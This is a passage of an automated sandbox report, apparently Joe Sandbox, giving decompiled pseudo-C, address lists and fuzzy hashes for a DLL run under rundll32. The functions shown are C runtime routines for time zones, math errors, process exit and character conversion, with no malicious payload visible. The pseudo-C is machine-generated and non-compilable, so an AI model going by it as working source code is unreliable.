                0x7ffa535e6763
                0x7ffa535e676e
                0x7ffa535e677b
                0x7ffa535e6786
                0x7ffa535e6793
                0x7ffa535e679a
                0x7ffa535e67a7
                0x7ffa535e67ae
                0x7ffa535e67bb
                0x7ffa535e67c2
                0x7ffa535e67cf
                0x7ffa535e67d6
                0x7ffa535e67e3
                0x7ffa535e67ea
                0x7ffa535e67ec
                0x7ffa535e67f6
                0x7ffa535e67fe
                0x7ffa535e6806
                0x7ffa535e6808
                0x7ffa535e680f
                0x7ffa535e6811
                0x7ffa535e6818
                0x7ffa535e681d
                0x7ffa535e681f
                0x7ffa535e6829
                0x7ffa535e6838
                0x7ffa535e683d
                0x7ffa535e683f
                0x7ffa535e683f
                0x7ffa535e6843
                0x7ffa535e6845
                0x7ffa535e6848
                0x7ffa535e684e
                0x7ffa535e6851
                0x7ffa535e6851
                0x7ffa535e6855
                0x7ffa535e6858
                0x7ffa535e685f
                0x7ffa535e6864
                0x7ffa535e6868
                0x7ffa535e686c
                0x7ffa535e6872
                0x7ffa535e6877
                0x7ffa535e6879
                0x7ffa535e687e
                0x7ffa535e6884
                0x7ffa535e6889
                0x7ffa535e689d
                0x7ffa535e68a6
                0x7ffa535e68b2
                0x7ffa535e68bc
                0x7ffa535e68be
                0x7ffa535e68c2
                0x7ffa535e68c5
                0x7ffa535e68ca
                0x7ffa535e68d5
                0x7ffa535e68d9
                0x7ffa535e68d9
                0x7ffa535e68dd
                0x7ffa535e68e0
                0x7ffa535e68e7
                0x7ffa535e68ed
                0x7ffa535e68f7
                0x7ffa535e6905
                0x7ffa535e6907
                0x7ffa535e690b
                0x7ffa535e690e
                0x7ffa535e6917
                0x7ffa535e6925
                0x7ffa535e6927
                0x7ffa535e692b
                0x7ffa535e692e
                0x7ffa535e693b
                0x7ffa535e6941
                0x7ffa535e6941
                0x7ffa535e6949
                0x7ffa535e694b
                0x7ffa535e694f
                0x7ffa535e6952
                0x7ffa535e695f
                0x7ffa535e6965
                0x7ffa535e6965
                0x7ffa535e696d
                0x7ffa535e696f
                0x7ffa535e6976
                0x7ffa535e697c
                0x7ffa535e697c
                0x7ffa535e6984
                0x7ffa535e6986
                0x7ffa535e698d
                0x7ffa535e699b
                0x7ffa535e69a4
                0x7ffa535e69af
                0x7ffa535e69b8
                0x7ffa535e69c3
                0x7ffa535e69cc
                0x7ffa535e69d7
                0x7ffa535e69e4
                0x7ffa535e69ef
                0x7ffa535e69fc
                0x7ffa535e6a07
                0x7ffa535e6a14
                0x7ffa535e6a1b
                0x7ffa535e6a28
                0x7ffa535e6a2f
                0x7ffa535e6a3c
                0x7ffa535e6a43
                0x7ffa535e6a50
                0x7ffa535e6a57
                0x7ffa535e6a64
                0x7ffa535e6a6b
                0x7ffa535e6a6d
                0x7ffa535e6a77
                0x7ffa535e6a79
                0x7ffa535e6a7d
                0x7ffa535e6a80
                0x7ffa535e6a82
                0x7ffa535e6a8a
                0x7ffa535e6a8c
                0x7ffa535e6a93
                0x7ffa535e6a95
                0x7ffa535e6a9c
                0x7ffa535e6a9e
                0x7ffa535e6aa2
                0x7ffa535e6aa4
                0x7ffa535e6aa7
                0x7ffa535e6aaf
                0x7ffa535e6ab1
                0x7ffa535e6ab5
                0x7ffa535e6abd
                0x7ffa535e6ac2
                0x7ffa535e6ac6
                0x7ffa535e6ac9
                0x7ffa535e6acb
                0x7ffa535e6ad3
                0x7ffa535e6ad8
                0x7ffa535e6ae1
                0x7ffa535e6aec
                0x7ffa535e6aef
                0x7ffa535e6af6
                0x7ffa535e6af9
                0x7ffa535e6afe
                0x7ffa535e6b02
                0x7ffa535e6b05
                0x7ffa535e6b13
                0x7ffa535e6b18
                0x7ffa535e6b1a
                0x7ffa535e6b1f
                0x7ffa535e6b25
                0x7ffa535e6b2d
                0x7ffa535e6b2f
                0x7ffa535e6b3a
                0x7ffa535e6b40
                0x7ffa535e6b45
                0x7ffa535e6b4c
                0x7ffa535e6b5d
                0x7ffa535e6b5f
                0x7ffa535e6b64
                0x7ffa535e6b6e
                0x7ffa535e6b74
                0x7ffa535e6b7a
                0x7ffa535e6b84
                0x7ffa535e6b8b
                0x7ffa535e6b92
                0x7ffa535e6b99
                0x7ffa535e6b9e
                0x7ffa535e6bab
                0x7ffa535e6bb5
                0x7ffa535e6bbc
                0x7ffa535e6bc3
                0x7ffa535e6bca
                0x7ffa535e6bcf
                0x7ffa535e6bdc
                0x7ffa535e6be2
                0x7ffa535e6bef
                0x7ffa535e6bf6
                0x7ffa535e6bfd
                0x7ffa535e6c04
                0x7ffa535e6c09
                0x7ffa535e6c2f

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: +$-$f$p
                • API String ID: 3215553584-588565063
                • Opcode ID: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction ID: 306b8eff74f54417a3e7e20041b2527a56d57bda196a8f21fce89b5a13644fe6
                • Opcode Fuzzy Hash: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction Fuzzy Hash: FB12D822E2CB538EFB605B10D044279669BEFD27A0F9CD2B1D69D175C4CB3DE488AB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EB50C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E00007FFA7FFA535EB50C(void* __ecx, void* __esi, void* __eflags, signed int** __rax, void* __rdx, void* __r8, signed int _a8, signed int _a16, signed int _a24, char _a32) {
				long long _v48;
				long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* __rbx;
				void* __rdi;
				void* _t34;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				signed int _t55;
				signed int _t59;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t77;
				signed int** _t78;
				signed int* _t85;
				signed int** _t86;
				long long _t90;
				void* _t94;
				long long _t95;
				void* _t103;

				_t93 = __rdx;
				_t78 = __rax;
				E00007FFA7FFA535EAA38(_t34);
				_a8 = 0;
				_t86 = _t78;
				_a16 = 0;
				_a24 = 0;
				if (E00007FFA7FFA535EAAA0(__ecx, _t78,  &_a8, __rdx) != 0) goto 0x535eb6cb;
				if (E00007FFA7FFA535EAA40(__ecx, _t78,  &_a16, __rdx) != 0) goto 0x535eb6b6;
				if (E00007FFA7FFA535EAA70(__ecx, _t78,  &_a24, __rdx, _t94) != 0) goto 0x535eb6a1;
				_t90 =  *0x53755278; // 0x0
				E00007FFA7FFA535E7E58(_t78, _t90);
				 *0x53755278 = _t95;
				if (GetTimeZoneInformation(??) == 0xffffffff) goto 0x535eb67a;
				_t55 =  *0x53755290 * 0x3c;
				_t7 = _t95 + 1; // 0x1
				r8d = _t7;
				_t70 =  *0x537552d6; // 0x0
				_t59 =  *0x537552e4; // 0x0
				 *0x53755280 = r8d;
				_a8 = _t55;
				if (_t70 == 0) goto 0x535eb5b3;
				_a8 = _t55 + _t59 * 0x3c;
				_t71 =  *0x5375532a; // 0x0
				if (_t71 == 0) goto 0x535eb5d4;
				_t42 =  *0x53755338; // 0x0
				if (_t42 == 0) goto 0x535eb5d4;
				_a16 = r8d;
				_a24 = (_t42 - _t59) * 0x3c;
				goto 0x535eb5da;
				_a16 = 0;
				_a24 = 0;
				E00007FFA7FFA535F04CC(_t55 + _t59 * 0x3c, _t77, _t78, _t86, 0x53755290, _t93, _t103);
				r9d = r9d | 0xffffffff;
				_v48 =  &_a32;
				_v56 = _t95;
				_v64 = 0x3f;
				_v72 =  *_t86;
				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x535eb626;
				if (_a32 != 0) goto 0x535eb626;
				( *_t86)[0xf] = sil;
				goto 0x535eb62c;
				 *( *_t86) = sil;
				r9d = r9d | 0xffffffff;
				_v48 =  &_a32;
				_v56 = _t95;
				_v64 = 0x3f;
				_v72 = _t86[1];
				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x535eb673;
				if (_a32 != 0) goto 0x535eb673;
				_t86[1][0xf] = sil;
				goto 0x535eb67a;
				_t85 = _t86[1];
				 *_t85 = sil;
				_t48 = E00007FFA7FFA535EAA30(_t47);
				 *_t85 = _a8;
				_t49 = E00007FFA7FFA535EAA20(_t48);
				 *_t85 = _a16;
				_t50 = E00007FFA7FFA535EAA28(_t49);
				 *_t85 = _a24;
				return _t50;
			}


























                0x7ffa535eb50c
                0x7ffa535eb50c
                0x7ffa535eb518
                0x7ffa535eb523
                0x7ffa535eb526
                0x7ffa535eb529
                0x7ffa535eb52c
                0x7ffa535eb536
                0x7ffa535eb547
                0x7ffa535eb558
                0x7ffa535eb55e
                0x7ffa535eb565
                0x7ffa535eb571
                0x7ffa535eb581
                0x7ffa535eb587
                0x7ffa535eb58e
                0x7ffa535eb58e
                0x7ffa535eb592
                0x7ffa535eb599
                0x7ffa535eb59f
                0x7ffa535eb5a6
                0x7ffa535eb5a9
                0x7ffa535eb5b0
                0x7ffa535eb5b3
                0x7ffa535eb5ba
                0x7ffa535eb5bc
                0x7ffa535eb5c4
                0x7ffa535eb5c8
                0x7ffa535eb5cf
                0x7ffa535eb5d2
                0x7ffa535eb5d4
                0x7ffa535eb5d7
                0x7ffa535eb5da
                0x7ffa535eb5eb
                0x7ffa535eb5f5
                0x7ffa535eb5fa
                0x7ffa535eb5ff
                0x7ffa535eb607
                0x7ffa535eb616
                0x7ffa535eb61b
                0x7ffa535eb620
                0x7ffa535eb624
                0x7ffa535eb629
                0x7ffa535eb630
                0x7ffa535eb634
                0x7ffa535eb646
                0x7ffa535eb64d
                0x7ffa535eb655
                0x7ffa535eb662
                0x7ffa535eb667
                0x7ffa535eb66d
                0x7ffa535eb671
                0x7ffa535eb673
                0x7ffa535eb677
                0x7ffa535eb67d
                0x7ffa535eb682
                0x7ffa535eb687
                0x7ffa535eb68c
                0x7ffa535eb691
                0x7ffa535eb696
                0x7ffa535eb6a0

                APIs
                • _get_daylight.LIBCMT ref: 00007FFA535EB52F
                  • Part of subcall function 00007FFA535EAAA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAAB4
                • _get_daylight.LIBCMT ref: 00007FFA535EB540
                  • Part of subcall function 00007FFA535EAA40: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA54
                • _get_daylight.LIBCMT ref: 00007FFA535EB551
                  • Part of subcall function 00007FFA535EAA70: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA84
                  • Part of subcall function 00007FFA535E7E58: HeapFree.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E6E
                  • Part of subcall function 00007FFA535E7E58: GetLastError.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E80
                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA535EB7B1), ref: 00007FFA535EB578
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB60E
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB65A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                • String ID: ?
                • API String ID: 500310315-1684325040
                • Opcode ID: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction ID: 4a97054d569c4b0cdfeb428315169a85bf3cda63ebc154d09537f472f6eee79c
                • Opcode Fuzzy Hash: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction Fuzzy Hash: 2461C37292CF428AE750DF20E9401B9776AFFC6794F48A136EA0E52A94DF3CE445D740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EC0AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                Download Yara Rule
                C-Code - Quality: 33%
                			E00007FFA7FFA535EC0AC(void* __eax, char __ecx, void* __rcx, void* __rdx, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v56;
				void* __rbx;
				void* _t32;
				void* _t37;
				long long _t47;
				void* _t48;
				void* _t55;
				void* _t56;
				void* _t57;

				asm("movsd [esp+0x20], xmm3");
				asm("movsd [esp+0x18], xmm2");
				_push(_t48);
				_t57 = _t56 - 0x50;
				r8d = 0;
				if ( *0x53671ce0 == _t37) goto 0x535ec0e7;
				r8d = r8d + 1;
				if (0x7ffa53671cf0 - 0x53671eb0 < 0) goto 0x535ec0cc;
				goto 0x535ec0f2;
				_t47 =  *((intOrPtr*)(0x53671ce0 + 8 + (r8d + r8d) * 8));
				 *((long long*)(_t57 + 0x28)) = _t47;
				if (_t47 == 0) goto 0x535ec165;
				_v40 =  *((intOrPtr*)(_t57 + 0x70));
				_v36 = _a28;
				_v32 = _a32;
				_v28 = _a36;
				_v24 = _a40;
				_v20 = _a44;
				_v56 = __ecx;
				E00007FFA7FFA535EC1A0(__ecx, _t47, _t48, _a48, __rdx, _t55);
				_t53 =  &_v56;
				if (E00007FFA7FFA535EF8B8(_t48,  &_v56) != 0) goto 0x535ec15d;
				E00007FFA7FFA535EC07C( &_v56);
				asm("movsd xmm0, [esp+0x40]");
				goto 0x535ec17a;
				E00007FFA7FFA535EC1A0(__ecx, _t47, _t48,  &_v56, __rdx, _t55);
				_t32 = E00007FFA7FFA535EC07C(_t53);
				asm("movsd xmm0, [esp+0x80]");
				return _t32;
			}


















                0x7ffa535ec0ac
                0x7ffa535ec0b2
                0x7ffa535ec0b8
                0x7ffa535ec0b9
                0x7ffa535ec0c9
                0x7ffa535ec0ce
                0x7ffa535ec0d0
                0x7ffa535ec0e1
                0x7ffa535ec0e5
                0x7ffa535ec0ed
                0x7ffa535ec0ff
                0x7ffa535ec107
                0x7ffa535ec10d
                0x7ffa535ec115
                0x7ffa535ec11d
                0x7ffa535ec125
                0x7ffa535ec130
                0x7ffa535ec13b
                0x7ffa535ec13f
                0x7ffa535ec143
                0x7ffa535ec148
                0x7ffa535ec154
                0x7ffa535ec158
                0x7ffa535ec15d
                0x7ffa535ec163
                0x7ffa535ec165
                0x7ffa535ec16c
                0x7ffa535ec171
                0x7ffa535ec17f

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _ctrlfp_set_errno_from_matherr
                • String ID: exp
                • API String ID: 4230380726-113136155
                • Opcode ID: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction ID: 7f92bde535e805f478016e6247d36e16d9f3180c8d1306ddfc0597af4ff2a88e
                • Opcode Fuzzy Hash: 7a0f5e8e16a34867d28b5421a4e9fafe03bbb8f68f44e6b1cde22d74a3a8ce8a
                • Instruction Fuzzy Hash: DC21FC36A28B85CBE764DF28E44066A73A5FFCA740F54A135F68E92B55DE3CD4409F00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7098 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction ID: 4179510b56d69c6193ada976ec2268c1f94c609e12c43dd7f7d25d74ae170532
                • Opcode Fuzzy Hash: aa18b5aad42a2f177d479b7848b9f49e39ea99a5c4d04320e61df440ed3d4797
                • Instruction Fuzzy Hash: 6DF04F61A39F4285EF449B61F4842792366EFCA790F4CA43AD94F96664DE3CD488C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F37AC Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                Download Yara Rule
                C-Code - Quality: 28%
                			E00007FFA7FFA535F37AC(signed int __ebx, void* __ecx, signed int __esi, void* __fp0, intOrPtr* __rcx, long long __rdx, intOrPtr* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t57;
				void* _t58;
				int _t65;
				int _t69;
				intOrPtr _t81;
				intOrPtr _t82;
				signed long long _t153;
				intOrPtr* _t156;
				intOrPtr* _t158;
				signed long long _t159;
				intOrPtr* _t172;
				signed long long _t179;
				signed long long _t180;
				signed long long _t181;
				signed long long _t182;
				intOrPtr* _t198;
				signed long long _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t214;
				void* _t218;
				void* _t219;
				long long _t220;
				intOrPtr* _t222;

				_t205 = _t204 - 0x88;
				_t203 = _t205 + 0x50;
				_t153 =  *0x53754140; // 0x9bd95a2971b4
				 *(_t203 + 0x28) = _t153 ^ _t203;
				r12d = 0;
				_t222 =  *((intOrPtr*)(_t203 + 0xa8));
				 *_t203 = r8d;
				 *((long long*)(_t203 + 8)) = __rdx;
				if (__ebx <= 0) goto 0x535f381f;
				_t58 = E00007FFA7FFA535F3620(_t57, __r9,  *((intOrPtr*)(_t203 + 0xa0)));
				if (__esi <= 0) goto 0x535f382b;
				E00007FFA7FFA535F3620(_t58, _t222,  *((intOrPtr*)(_t203 + 0xb0)));
				goto 0x535f3830;
				if (__ebx - 0xffffffff >= 0) goto 0x535f3804;
				goto 0x535f3b21;
				if (__esi - 0xffffffff < 0) goto 0x535f3824;
				r14d =  *((intOrPtr*)(_t203 + 0xb8));
				if (r14d != 0) goto 0x535f3843;
				r14d =  *((intOrPtr*)( *__rcx + 0xc));
				if (__ebx == 0) goto 0x535f3854;
				if (__esi != 0) goto 0x535f38ef;
				if (__ebx != __esi) goto 0x535f3862;
				goto 0x535f3b21;
				if (__esi - 1 <= 0) goto 0x535f386d;
				goto 0x535f3b21;
				if (__ebx - 1 <= 0) goto 0x535f387b;
				goto 0x535f3b21;
				if (GetCPInfo(??, ??) == 0) goto 0x535f3824;
				if (__ebx <= 0) goto 0x535f38bb;
				if ( *((intOrPtr*)(_t203 + 0x10)) - 2 < 0) goto 0x535f3871;
				_t156 = _t203 + 0x16;
				if ( *((intOrPtr*)(_t203 + 0x16)) == r12b) goto 0x535f3871;
				if ( *((intOrPtr*)(_t156 + 1)) == r12b) goto 0x535f3871;
				_t81 =  *__r9;
				if (_t81 -  *_t156 < 0) goto 0x535f38b2;
				if (_t81 -  *((intOrPtr*)(_t156 + 1)) <= 0) goto 0x535f3858;
				goto 0x535f389e;
				if (__esi <= 0) goto 0x535f38ef;
				if ( *((intOrPtr*)(_t203 + 0x10)) - 2 < 0) goto 0x535f3866;
				_t158 = _t203 + 0x16;
				if ( *((intOrPtr*)(_t203 + 0x16)) == r12b) goto 0x535f3866;
				if ( *((intOrPtr*)(_t158 + 1)) == r12b) goto 0x535f3866;
				_t82 =  *_t222;
				if (_t82 -  *_t158 < 0) goto 0x535f38e6;
				if (_t82 -  *((intOrPtr*)(_t158 + 1)) <= 0) goto 0x535f3858;
				_t159 = _t158 + 2;
				goto 0x535f38cd;
				 *(_t205 + 0x28) = r12d;
				r9d = __ebx;
				 *((long long*)(_t205 + 0x20)) = _t220;
				_t65 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t65 == 0) goto 0x535f3824;
				_t195 = _t65 + _t65;
				_t22 = _t195 + 0x10; // 0x10
				asm("dec eax");
				if ((_t22 & _t159) == 0) goto 0x535f39a9;
				_t25 = _t195 + 0x10; // 0x10
				_t179 = _t25;
				asm("dec eax");
				_t26 = _t195 + 0x10; // 0x10
				if ((_t159 & _t179) - 0x400 > 0) goto 0x535f3987;
				asm("dec eax");
				_t180 = _t179 & _t26;
				_t27 = _t180 + 0xf; // 0x1f
				if (_t27 - _t180 > 0) goto 0x535f3965;
				E00007FFA7FFA535F54B0(r14d, 0xffffffffffffff0, _t180, _t65 + _t65, 0xfffffff0, _t218, _t219);
				_t206 = _t205 - 0xfffffff0;
				_t198 = _t206 + 0x50;
				if (_t198 == 0) goto 0x535f3b07;
				 *_t198 = 0xcccc;
				goto 0x535f39a3;
				asm("dec eax");
				_t181 = _t180 & 0xffffffffffffff0;
				E00007FFA7FFA535E7E98(_t181);
				if (0xffffffffffffff0 == 0) goto 0x535f39ab;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x535f39ab;
				if (0x1000000000000000 == 0) goto 0x535f3b07;
				 *(_t206 + 0x28) = r12d;
				r9d = __ebx;
				 *(_t206 + 0x20) = 0x1000000000000000;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) goto 0x535f3b07;
				 *(_t206 + 0x28) =  *(_t206 + 0x28) & 0x00000000;
				r9d = __esi;
				 *(_t206 + 0x20) =  *(_t206 + 0x20) & 0x00000000;
				_t69 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t69 == 0) goto 0x535f3b07;
				_t214 = _t69 + _t69;
				asm("dec eax");
				if ((_t214 + 0x00000010 & _t181) == 0) goto 0x535f3a92;
				_t182 = _t214 + 0x10;
				asm("dec eax");
				if ((0xffffffffffffff0 & _t182) - 0x400 > 0) goto 0x535f3a70;
				asm("dec eax");
				if ((_t182 & _t214 + 0x00000010) + 0xf - (_t182 & _t214 + 0x00000010) > 0) goto 0x535f3a4e;
				E00007FFA7FFA535F54B0(r14d, 0xffffffffffffff0, _t182 & _t214 + 0x00000010, _t214 + 0x10, _t214, _t218, _t219);
				_t207 = _t206 - 0xfffffff0;
				_t172 = _t207 + 0x50;
				if (_t172 == 0) goto 0x535f3aed;
				 *_t172 = 0xcccc;
				goto 0x535f3a8c;
				asm("dec eax");
				E00007FFA7FFA535E7E98(_t182 & _t214 + 0x00000010 & 0xffffffffffffff0);
				if (0xffffffffffffff0 == 0) goto 0x535f3a94;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x535f3a94;
				if (0x1000000000000000 == 0) goto 0x535f3aed;
				 *((intOrPtr*)(_t207 + 0x28)) = r15d;
				r9d = __esi;
				 *((long long*)(_t207 + 0x20)) = 0x1000000000000000;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) goto 0x535f3aed;
				 *(_t207 + 0x40) =  *(_t207 + 0x40) & 0x00000000;
				r9d = r12d;
				 *(_t207 + 0x38) =  *(_t207 + 0x38) & 0x00000000;
				 *(_t207 + 0x30) =  *(_t207 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t207 + 0x28)) = r15d;
				 *((long long*)(_t207 + 0x20)) = 0x1000000000000000;
				E00007FFA7FFA535ED8B8(_t72, __fp0, 0x1000000000000000,  *((intOrPtr*)(_t203 + 8)), _t214 + 0x10, 0x1000000000000000, _t153 ^ _t203, _t203, 0x1000000000000000);
				goto 0x535f3aef;
				if (0x1000000000000000 == 0) goto 0x535f3b09;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x535f3b09;
				E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xffffffffffffff0);
				goto 0x535f3b09;
				if (0x1000000000000000 == 0) goto 0x535f3b1f;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x535f3b1f;
				E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xffffffffffffff0);
				E00007FFA7FFA535F51E0();
				return 0;
			}

































                0x7ffa535f37b9
                0x7ffa535f37c0
                0x7ffa535f37c5
                0x7ffa535f37cf
                0x7ffa535f37da
                0x7ffa535f37dd
                0x7ffa535f37e7
                0x7ffa535f37ee
                0x7ffa535f37f4
                0x7ffa535f37fc
                0x7ffa535f380d
                0x7ffa535f3815
                0x7ffa535f381d
                0x7ffa535f3822
                0x7ffa535f3826
                0x7ffa535f382e
                0x7ffa535f3830
                0x7ffa535f383a
                0x7ffa535f383f
                0x7ffa535f384a
                0x7ffa535f384e
                0x7ffa535f3856
                0x7ffa535f385d
                0x7ffa535f3864
                0x7ffa535f3868
                0x7ffa535f386f
                0x7ffa535f3876
                0x7ffa535f388a
                0x7ffa535f388e
                0x7ffa535f3894
                0x7ffa535f389a
                0x7ffa535f389e
                0x7ffa535f38a4
                0x7ffa535f38a6
                0x7ffa535f38ab
                0x7ffa535f38b0
                0x7ffa535f38b9
                0x7ffa535f38bd
                0x7ffa535f38c3
                0x7ffa535f38c9
                0x7ffa535f38cd
                0x7ffa535f38d3
                0x7ffa535f38d5
                0x7ffa535f38db
                0x7ffa535f38e0
                0x7ffa535f38e6
                0x7ffa535f38ed
                0x7ffa535f38ef
                0x7ffa535f38f4
                0x7ffa535f38fa
                0x7ffa535f3907
                0x7ffa535f3912
                0x7ffa535f3925
                0x7ffa535f3928
                0x7ffa535f392f
                0x7ffa535f3935
                0x7ffa535f3937
                0x7ffa535f3937
                0x7ffa535f393e
                0x7ffa535f394a
                0x7ffa535f394e
                0x7ffa535f3953
                0x7ffa535f3956
                0x7ffa535f3959
                0x7ffa535f3960
                0x7ffa535f3969
                0x7ffa535f396e
                0x7ffa535f3971
                0x7ffa535f3979
                0x7ffa535f397f
                0x7ffa535f3985
                0x7ffa535f398a
                0x7ffa535f398d
                0x7ffa535f3990
                0x7ffa535f399b
                0x7ffa535f399d
                0x7ffa535f39a7
                0x7ffa535f39ae
                0x7ffa535f39b4
                0x7ffa535f39b9
                0x7ffa535f39bf
                0x7ffa535f39d4
                0x7ffa535f39da
                0x7ffa535f39df
                0x7ffa535f39e2
                0x7ffa535f39f3
                0x7ffa535f39fe
                0x7ffa535f3a07
                0x7ffa535f3a11
                0x7ffa535f3a17
                0x7ffa535f3a19
                0x7ffa535f3a20
                0x7ffa535f3a30
                0x7ffa535f3a35
                0x7ffa535f3a42
                0x7ffa535f3a52
                0x7ffa535f3a57
                0x7ffa535f3a5a
                0x7ffa535f3a62
                0x7ffa535f3a68
                0x7ffa535f3a6e
                0x7ffa535f3a73
                0x7ffa535f3a79
                0x7ffa535f3a84
                0x7ffa535f3a86
                0x7ffa535f3a90
                0x7ffa535f3a97
                0x7ffa535f3a99
                0x7ffa535f3a9e
                0x7ffa535f3aa4
                0x7ffa535f3ab9
                0x7ffa535f3abb
                0x7ffa535f3ac1
                0x7ffa535f3ac4
                0x7ffa535f3acd
                0x7ffa535f3ada
                0x7ffa535f3adf
                0x7ffa535f3ae4
                0x7ffa535f3aeb
                0x7ffa535f3af2
